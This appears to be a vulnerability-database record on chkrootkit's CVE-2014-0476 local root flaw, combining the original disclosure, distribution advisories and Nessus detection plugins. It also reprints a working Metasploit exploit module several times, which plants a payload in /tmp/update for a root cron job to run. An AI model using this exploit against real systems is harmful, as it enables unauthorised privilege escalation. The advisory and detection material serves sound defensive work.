"chkrootkit: Local privilege escalation", "type": "gentoo", "cvss": {"score": 3.7, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "zdt": [{"lastseen": "2018-01-08T15:16:17", "description": "Exploit for linux platform in category local exploits", "edition": 2, "published": "2014-06-28T00:00:00", "type": "zdt", "title": "chkrootkit 0.49 - Local Root Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0476"], "modified": "2014-06-28T00:00:00", "id": "1337DAY-ID-22384", "href": "https://0day.today/exploit/description/22384", "sourceData": "We just found a serious vulnerability in the chkrootkit package, which\r\nmay allow local attackers to gain root access to a box in certain\r\nconfigurations (/tmp not mounted noexec).\r\n \r\nThe vulnerability is located in the function slapper() in the\r\nshellscript chkrootkit:\r\n \r\n#\r\n# SLAPPER.{A,B,C,D} and the multi-platform variant\r\n#\r\nslapper (){\r\n SLAPPER_FILES=\"${ROOTDIR}tmp/.bugtraq ${ROOTDIR}tmp/.bugtraq.c\"\r\n SLAPPER_FILES=\"$SLAPPER_FILES ${ROOTDIR}tmp/.unlock ${ROOTDIR}tmp/httpd \\\r\n ${ROOTDIR}tmp/update ${ROOTDIR}tmp/.cinik ${ROOTDIR}tmp/.b\"a\r\n SLAPPER_PORT=\"0.0:2002 |0.0:4156 |0.0:1978 |0.0:1812 |0.0:2015 \"\r\n OPT=-an\r\n STATUS=0\r\n file_port=\r\n \r\n if ${netstat} \"${OPT}\"|${egrep} \"^tcp\"|${egrep} \"${SLAPPER_PORT}\">\r\n/dev/null 2>&1\r\n then\r\n STATUS=1\r\n [ \"$SYSTEM\" = \"Linux\" ] && file_port=`netstat -p ${OPT} | \\\r\n $egrep ^tcp|$egrep \"${SLAPPER_PORT}\" | ${awk} '{ print $7 }' |\r\ntr -d :`\r\n fi\r\n for i in ${SLAPPER_FILES}; do\r\n if [ -f ${i} ]; then\r\n file_port=$file_port $i\r\n STATUS=1\r\n fi\r\n done\r\n if [ ${STATUS} -eq 1 ] ;then\r\n echo \"Warning: Possible Slapper Worm installed ($file_port)\"\r\n else\r\n if [ \"${QUIET}\" != \"t\" ]; then echo \"not infected\"; fi\r\n return ${NOT_INFECTED}\r\n fi\r\n}\r\n \r\n \r\nThe line 'file_port=$file_port $i' will execute all files specified in\r\n$SLAPPER_FILES as the user chkrootkit is running (usually root), if\r\n$file_port is empty, because of missing quotation marks around the\r\nvariable assignment.\r\n \r\nSteps to reproduce:\r\n \r\n- Put an executable file named 'update' with non-root owner in /tmp (not\r\nmounted noexec, obviously)\r\n- Run chkrootkit (as uid 0)\r\n \r\nResult: The file /tmp/update will be executed as root, thus effectively\r\nrooting your box, if malicious content is placed inside the file.\r\n \r\nIf an attacker knows you are periodically running chkrootkit (like in\r\ncron.daily) and has write access to /tmp (not mounted noexec), he may\r\neasily take advantage of this.\r\n \r\n \r\nSuggested fix: Put quotation marks around the assignment.\r\n \r\nfile_port=\"$file_port $i\"\r\n \r\n \r\nI will also try to contact upstream, although the latest version of\r\nchkrootkit dates back to 2009 - will have to see, if I reach a dev there.\n\n# 0day.today [2018-01-08] #", "cvss": {"score": 3.7, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/22384"}, {"lastseen": "2018-01-01T07:03:13", "description": "Chkrootkit before 0.50 will run any executable file named /tmp/update as root, allowing a trivial privsec. WfsDelay is set to 24h, since this is how often a chkrootkit scan is scheduled by default.", "edition": 2, "published": "2015-11-20T00:00:00", "type": "zdt", "title": "Chkrootkit Local Privilege Escalation Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0476"], "modified": "2015-11-20T00:00:00", "id": "1337DAY-ID-24595", "href": "https://0day.today/exploit/description/24595", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\nclass Metasploit4 < Msf::Exploit::Local\r\n \r\n # This could also be Excellent, but since it requires\r\n # up to one day to pop a shell, let's set it to Manual instead.\r\n Rank = ManualRanking\r\n \r\n include Msf::Post::File\r\n include Msf::Exploit::FileDropper\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Chkrootkit Local Privilege Escalation',\r\n 'Description' => %q{\r\n Chkrootkit before 0.50 will run any executable file named\r\n /tmp/update as root, allowing a trivial privsec.\r\n \r\n WfsDelay is set to 24h, since this is how often a chkrootkit\r\n scan is scheduled by default.\r\n },\r\n 'Author' => [\r\n 'Thomas Stangner', # Original exploit\r\n 'Julien \"jvoisin\" Voisin' # Metasploit module\r\n ],\r\n 'References' => [\r\n ['CVE', '2014-0476'],\r\n ['OSVDB', '107710'],\r\n ['EDB', '33899'],\r\n ['BID', '67813'],\r\n ['CWE', '20'],\r\n ['URL', 'http://seclists.org/oss-sec/2014/q2/430']\r\n ],\r\n 'DisclosureDate' => 'Jun 04 2014',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'unix',\r\n 'Arch' => ARCH_CMD,\r\n 'SessionTypes' => ['shell', 'meterpreter'],\r\n 'Privileged' => true,\r\n 'Stance' => Msf::Exploit::Stance::Passive,\r\n 'Targets' => [['Automatic', {}]],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {'WfsDelay' => 60 * 60 * 24} # 24h\r\n ))\r\n \r\n register_options([\r\n OptString.new('CHKROOTKIT', [true, 'Path to chkrootkit', '/usr/sbin/chkrootkit'])\r\n ])\r\n end\r\n \r\n def check\r\n version = cmd_exec(\"#{datastore['CHKROOTKIT']} -V 2>&1\")\r\n \r\n if version =~ /chkrootkit version 0\\.[1-4]/\r\n Exploit::CheckCode::Appears\r\n else\r\n Exploit::CheckCode::Safe\r\n end\r\n end\r\n \r\n def exploit\r\n print_warning('Rooting depends on the crontab (this could take a while)')\r\n \r\n write_file('/tmp/update', \"#!/bin/sh\\n(#{payload.encoded}) &\\n\")\r\n cmd_exec('chmod +x /tmp/update')\r\n register_file_for_cleanup('/tmp/update')\r\n \r\n print_status('Payload written to /tmp/update')\r\n print_status('Waiting for chkrootkit to run via cron...')\r\n end\r\n \r\nend\n\n# 0day.today [2018-01-01] #", "cvss": {"score": 3.7, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/24595"}], "exploitdb": [{"lastseen": "2016-02-04T08:49:27", "description": "Chkrootkit Local Privilege Escalation. CVE-2014-0476. Local exploit for linux platform", "published": "2015-11-20T00:00:00", "type": "exploitdb", "title": "Chkrootkit Local Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0476"], "modified": "2015-11-20T00:00:00", "id": "EDB-ID:38775", "href": "https://www.exploit-db.com/exploits/38775/", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass Metasploit4 < Msf::Exploit::Local\r\n\r\n # This could also be Excellent, but since it requires\r\n # up to one day to pop a shell, let's set it to Manual instead.\r\n Rank = ManualRanking\r\n\r\n include Msf::Post::File\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Chkrootkit Local Privilege Escalation',\r\n 'Description' => %q{\r\n Chkrootkit before 0.50 will run any executable file named\r\n /tmp/update as root, allowing a trivial privsec.\r\n\r\n WfsDelay is set to 24h, since this is how often a chkrootkit\r\n scan is scheduled by default.\r\n },\r\n 'Author' => [\r\n 'Thomas Stangner', # Original exploit\r\n 'Julien \"jvoisin\" Voisin' # Metasploit module\r\n ],\r\n 'References' => [\r\n ['CVE', '2014-0476'],\r\n ['OSVDB', '107710'],\r\n ['EDB', '33899'],\r\n ['BID', '67813'],\r\n ['CWE', '20'],\r\n ['URL', 'http://seclists.org/oss-sec/2014/q2/430']\r\n ],\r\n 'DisclosureDate' => 'Jun 04 2014',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'unix',\r\n 'Arch' => ARCH_CMD,\r\n 'SessionTypes' => ['shell', 'meterpreter'],\r\n 'Privileged' => true,\r\n 'Stance' => Msf::Exploit::Stance::Passive,\r\n 'Targets' => [['Automatic', {}]],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {'WfsDelay' => 60 * 60 * 24} # 24h\r\n ))\r\n\r\n register_options([\r\n OptString.new('CHKROOTKIT', [true, 'Path to chkrootkit', '/usr/sbin/chkrootkit'])\r\n ])\r\n end\r\n\r\n def check\r\n version = cmd_exec(\"#{datastore['CHKROOTKIT']} -V 2>&1\")\r\n\r\n if version =~ /chkrootkit version 0\\.[1-4]/\r\n Exploit::CheckCode::Appears\r\n else\r\n Exploit::CheckCode::Safe\r\n end\r\n end\r\n\r\n def exploit\r\n print_warning('Rooting depends on the crontab (this could take a while)')\r\n\r\n write_file('/tmp/update', \"#!/bin/sh\\n(#{payload.encoded}) &\\n\")\r\n cmd_exec('chmod +x /tmp/update')\r\n register_file_for_cleanup('/tmp/update')\r\n\r\n print_status('Payload written to /tmp/update')\r\n print_status('Waiting for chkrootkit to run via cron...')\r\n end\r\n\r\nend", "cvss": {"score": 3.7, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/38775/"}, {"lastseen": "2016-02-03T20:06:05", "description": "chkrootkit 0.49 - Local Root Vulnerability. CVE-2014-0476. Local exploit for linux platform", "published": "2014-06-28T00:00:00", "type": "exploitdb", "title": "chkrootkit 0.49 - Local Root Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0476"], "modified": "2014-06-28T00:00:00", "id": "EDB-ID:33899", "href": "https://www.exploit-db.com/exploits/33899/", "sourceData": "We just found a serious vulnerability in the chkrootkit package, which\r\nmay allow local attackers to gain root access to a box in certain\r\nconfigurations (/tmp not mounted noexec).\r\n\r\nThe vulnerability is located in the function slapper() in the\r\nshellscript chkrootkit:\r\n\r\n#\r\n# SLAPPER.{A,B,C,D} and the multi-platform variant\r\n#\r\nslapper (){\r\n SLAPPER_FILES=\"${ROOTDIR}tmp/.bugtraq ${ROOTDIR}tmp/.bugtraq.c\"\r\n SLAPPER_FILES=\"$SLAPPER_FILES ${ROOTDIR}tmp/.unlock ${ROOTDIR}tmp/httpd \\\r\n ${ROOTDIR}tmp/update ${ROOTDIR}tmp/.cinik ${ROOTDIR}tmp/.b\"a\r\n SLAPPER_PORT=\"0.0:2002 |0.0:4156 |0.0:1978 |0.0:1812 |0.0:2015 \"\r\n OPT=-an\r\n STATUS=0\r\n file_port=\r\n\r\n if ${netstat} \"${OPT}\"|${egrep} \"^tcp\"|${egrep} \"${SLAPPER_PORT}\">\r\n/dev/null 2>&1\r\n then\r\n STATUS=1\r\n [ \"$SYSTEM\" = \"Linux\" ] && file_port=`netstat -p ${OPT} | \\\r\n $egrep ^tcp|$egrep \"${SLAPPER_PORT}\" | ${awk} '{ print $7 }' |\r\ntr -d :`\r\n fi\r\n for i in ${SLAPPER_FILES}; do\r\n if [ -f ${i} ]; then\r\n file_port=$file_port $i\r\n STATUS=1\r\n fi\r\n done\r\n if [ ${STATUS} -eq 1 ] ;then\r\n echo \"Warning: Possible Slapper Worm installed ($file_port)\"\r\n else\r\n if [ \"${QUIET}\" != \"t\" ]; then echo \"not infected\"; fi\r\n return ${NOT_INFECTED}\r\n fi\r\n}\r\n\r\n\r\nThe line 'file_port=$file_port $i' will execute all files specified in\r\n$SLAPPER_FILES as the user chkrootkit is running (usually root), if\r\n$file_port is empty, because of missing quotation marks around the\r\nvariable assignment.\r\n\r\nSteps to reproduce:\r\n\r\n- Put an executable file named 'update' with non-root owner in /tmp (not\r\nmounted noexec, obviously)\r\n- Run chkrootkit (as uid 0)\r\n\r\nResult: The file /tmp/update will be executed as root, thus effectively\r\nrooting your box, if malicious content is placed inside the file.\r\n\r\nIf an attacker knows you are periodically running chkrootkit (like in\r\ncron.daily) and has write access to /tmp (not mounted noexec), he may\r\neasily take advantage of this.\r\n\r\n\r\nSuggested fix: Put quotation marks around the assignment.\r\n\r\nfile_port=\"$file_port $i\"\r\n\r\n\r\nI will also try to contact upstream, although the latest version of\r\nchkrootkit dates back to 2009 - will have to see, if I reach a dev there.", "cvss": {"score": 3.7, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/33899/"}], "packetstorm": [{"lastseen": "2016-12-05T22:17:39", "description": "", "published": "2015-11-20T00:00:00", "type": "packetstorm", "title": "Chkrootkit Local Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0476"], "modified": "2015-11-20T00:00:00", "id": "PACKETSTORM:134484", "href": "https://packetstormsecurity.com/files/134484/Chkrootkit-Local-Privilege-Escalation.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass Metasploit4 < Msf::Exploit::Local \n \n# This could also be Excellent, but since it requires \n# up to one day to pop a shell, let's set it to Manual instead. \nRank = ManualRanking \n \ninclude Msf::Post::File \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Chkrootkit Local Privilege Escalation', \n'Description' => %q{ \nChkrootkit before 0.50 will run any executable file named \n/tmp/update as root, allowing a trivial privsec. \n \nWfsDelay is set to 24h, since this is how often a chkrootkit \nscan is scheduled by default. \n}, \n'Author' => [ \n'Thomas Stangner', # Original exploit \n'Julien \"jvoisin\" Voisin' # Metasploit module \n], \n'References' => [ \n['CVE', '2014-0476'], \n['OSVDB', '107710'], \n['EDB', '33899'], \n['BID', '67813'], \n['CWE', '20'], \n['URL', 'http://seclists.org/oss-sec/2014/q2/430'] \n], \n'DisclosureDate' => 'Jun 04 2014', \n'License' => MSF_LICENSE, \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'SessionTypes' => ['shell', 'meterpreter'], \n'Privileged' => true, \n'Stance' => Msf::Exploit::Stance::Passive, \n'Targets' => [['Automatic', {}]], \n'DefaultTarget' => 0, \n'DefaultOptions' => {'WfsDelay' => 60 * 60 * 24} # 24h \n)) \n \nregister_options([ \nOptString.new('CHKROOTKIT', [true, 'Path to chkrootkit', '/usr/sbin/chkrootkit']) \n]) \nend \n \ndef check \nversion = cmd_exec(\"#{datastore['CHKROOTKIT']} -V 2>&1\") \n \nif version =~ /chkrootkit version 0\\.[1-4]/ \nExploit::CheckCode::Appears \nelse \nExploit::CheckCode::Safe \nend \nend \n \ndef exploit \nprint_warning('Rooting depends on the crontab (this could take a while)') \n \nwrite_file('/tmp/update', \"#!/bin/sh\\n(#{payload.encoded}) &\\n\") \ncmd_exec('chmod +x /tmp/update') \nregister_file_for_cleanup('/tmp/update') \n \nprint_status('Payload written to /tmp/update') \nprint_status('Waiting for chkrootkit to run via cron...') \nend \n \nend \n`\n", "cvss": {"score": 3.7, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/134484/chkrootkit.rb.txt"}], "debian": [{"lastseen": "2019-05-30T02:22:30", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0476"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2945-1 security@debian.org\nhttp://www.debian.org/security/ Giuseppe Iuculano\nJune 03, 2014 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : chkrootkit\nCVE ID : CVE-2014-0476\n\nThomas Stangner discovered a vulnerability in chkrootkit, a rootkit\ndetector, which may allow local attackers to gain root access when /tmp\nis mounted without the noexec option.\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 0.49-4.1+deb7u2.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 0.49-5.\n\nWe recommend that you upgrade your chkrootkit packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 2, "modified": "2014-06-03T21:37:45", "published": "2014-06-03T21:37:45", "id": "DEBIAN:DSA-2945-1:D051E", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2014/msg00125.html", "title": "[SECURITY] [DSA 2945-1] chkrootkit security update", "type": "debian", "cvss": {"score": 3.7, "vector": "AV:L/AC:H/Au:N/C:P/I:P/A:P"}}], "amazon": [{"lastseen": "2020-11-10T12:36:27", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0476"], "description": "**Issue Overview:**\n\nA quoting issue was found in chkrootkit which would lead to a file in /tmp/ being executed, if /tmp/ was mounted without the noexec option. chkrootkit is typically run as the root user. A local attacker could use this flaw to escalate their privileges.\n\n \n**Affected Packages:** \n\n\nchkrootkit\n\n \n**Issue Correction:** \nRun _yum update chkrootkit_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n chkrootkit-debuginfo-0.49-9.8.amzn1.i686 \n chkrootkit-0.49-9.8.amzn1.i686 \n \n src: \n chkrootkit-0.49-9.8.amzn1.src \n \n x86_64: \n chkrootkit-0.49-9.8.amzn1.x86_64 \n chkrootkit-debuginfo-0.49-9.8.amzn1.x86_64 \n \n \n", "edition": 4, "modified": "2014-07-09T16:36:00", "published": "2014-07-09T16:36:00", "id": "ALAS-2014-370", "href": "https://alas.aws.amazon.com/ALAS-2014-370.html", "title": "Important: chkrootkit", "type": "amazon", "cvss": {"score": 3.7, "vector": "AV:L/AC:H/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2020-10-14T23:37:42", "description": "Chkrootkit before 0.50 will run any executable file named /tmp/update as root, allowing a trivial privilege escalation. WfsDelay is set to 24h, since this is how often a chkrootkit scan is scheduled by default.\n", "published": "2015-11-18T18:50:57", "type": "metasploit", "title": "Chkrootkit Local Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0476"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/UNIX/LOCAL/CHKROOTKIT", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n\n # This could also be Excellent, but since it requires\n # up to one day to pop a shell, let's set it to Manual instead.\n Rank = ManualRanking\n\n include Msf::Post::File\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Chkrootkit Local Privilege Escalation',\n 'Description' => %q{\n Chkrootkit before 0.50 will run any executable file named /tmp/update\n as root, allowing a trivial privilege escalation.\n\n WfsDelay is set to 24h, since this is how often a chkrootkit scan is\n scheduled by default.\n },\n 'Author' => [\n 'Thomas Stangner', # Original exploit\n 'Julien \"jvoisin\" Voisin' # Metasploit module\n ],\n 'References' => [\n ['CVE', '2014-0476'],\n ['OSVDB', '107710'],\n ['EDB', '33899'],\n ['BID', '67813'],\n ['CWE', '20'],\n ['URL', 'https://seclists.org/oss-sec/2014/q2/430']\n ],\n 'DisclosureDate' => '2014-06-04',\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Privileged' => true,\n 'Stance' => Msf::Exploit::Stance::Passive,\n 'Targets' => [['Automatic', {}]],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {'WfsDelay' => 60 * 60 * 24} # 24h\n ))\n\n register_options([\n OptString.new('CHKROOTKIT', [true, 'Path to chkrootkit', '/usr/sbin/chkrootkit'])\n ])\n end\n\n def check\n version = cmd_exec(\"#{datastore['CHKROOTKIT']} -V 2>&1\")\n\n if version =~ /chkrootkit version 0\\.[1-4]/\n Exploit::CheckCode::Appears\n else\n Exploit::CheckCode::Safe\n end\n end\n\n def exploit\n print_warning('Rooting depends on the crontab (this could take a while)')\n\n write_file('/tmp/update', \"#!/bin/sh\\n(#{payload.encoded}) &\\n\")\n cmd_exec('chmod +x /tmp/update')\n register_file_for_cleanup('/tmp/update')\n\n print_status('Payload written to /tmp/update')\n print_status('Waiting for chkrootkit to run via cron...')\n end\nend\n", "cvss": {"score": 3.7, "vector": "AV:L/AC:H/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/local/chkrootkit.rb"}], "nessus": [{"lastseen": "2021-01-07T11:54:38", "description": "Updated chkrootkit package fixes security vulnerability :\n\nThe chkrootkit script contains a flaw that allows a local attacker to\ncreate an executable in /tmp that will be run by the user running\nchkrootkit (usually root), allowing the attacker to escalate\nprivileges (CVE-2014-0476).", "edition": 25, "published": "2014-06-12T00:00:00", "title": "Mandriva Linux Security Advisory : chkrootkit (MDVSA-2014:122)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0476"], "modified": "2014-06-12T00:00:00", "cpe": ["cpe:/o:mandriva:business_server:1", "p-cpe:/a:mandriva:linux:chkrootkit"], "id": "MANDRIVA_MDVSA-2014-122.NASL", "href": "https://www.tenable.com/plugins/nessus/74480", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2014:122. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(74480);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2014-0476\");\n script_bugtraq_id(67813);\n script_xref(name:\"MDVSA\", value:\"2014:122\");\n\n script_name(english:\"Mandriva Linux Security Advisory : chkrootkit (MDVSA-2014:122)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Mandriva Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated chkrootkit package fixes security vulnerability :\n\nThe chkrootkit script contains a flaw that allows a local attacker to\ncreate an executable in /tmp that will be run by the user running\nchkrootkit (usually root), allowing the attacker to escalate\nprivileges (CVE-2014-0476).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0249.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected chkrootkit package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Chkrootkit Local Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:chkrootkit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"chkrootkit-0.49-6.1.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 3.7, "vector": "AV:L/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:12:54", "description": "A quoting issue was found in chkrootkit which would lead to a file in\n/tmp/ being executed, if /tmp/ was mounted without the noexec option.\nchkrootkit is typically run as the root user. A local attacker could\nuse this flaw to escalate their privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 14, "published": "2014-06-13T00:00:00", "title": "Fedora 19 : chkrootkit-0.49-9.fc19 (2014-7090)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0476"], "modified": "2014-06-13T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:19", "p-cpe:/a:fedoraproject:fedora:chkrootkit"], "id": "FEDORA_2014-7090.NASL", "href": "https://www.tenable.com/plugins/nessus/74502", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-7090.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(74502);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-0476\");\n script_bugtraq_id(67813);\n script_xref(name:\"FEDORA\", value:\"2014-7090\");\n\n script_name(english:\"Fedora 19 : chkrootkit-0.49-9.fc19 (2014-7090)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A quoting issue was found in chkrootkit which would lead to a file in\n/tmp/ being executed, if /tmp/ was mounted without the noexec option.\nchkrootkit is typically run as the root user. A local attacker could\nuse this flaw to escalate their privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1104456\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1104457\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-June/134341.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?96585382\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected chkrootkit package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Chkrootkit Local Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:chkrootkit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) 